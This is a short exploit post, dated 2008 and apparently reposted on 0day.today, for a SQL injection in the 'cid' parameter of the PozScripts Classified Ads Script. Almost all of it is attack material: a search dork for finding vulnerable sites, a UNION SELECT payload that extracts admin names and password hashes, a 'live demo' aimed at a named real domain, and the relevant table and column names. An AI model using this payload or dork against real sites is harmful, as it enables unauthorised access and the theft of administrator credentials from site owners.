id: 3480
date: 07/29/2008
title: PozScripts Classified Ads Script (cid) SQL Injection Vulnerability
author: Hussin X
cves: 

==================================================================
PozScripts Classified Ads Script (cid) SQL Injection Vulnerability
==================================================================



|___________________________________________________|
|
| Classified Ads (cid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|___________________________________________________
|                                                   |
|
| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=5
|
| DorK   : inurl:browsecats.php?cid=
|___________________________________________________|






Exploit:  

www.[target].com/Script/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--




L!VE DEMO:


http://www.bbx.com/bbxca/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--


________________________
table_name : column_name

bbxbzauctions_admin:admin_name
bbxbzauctions_admin:pwd
freetplbanners_admin:admin_name
freetplbanners_admin:pwd

________________________



#  0day.today [2023-03-24]  #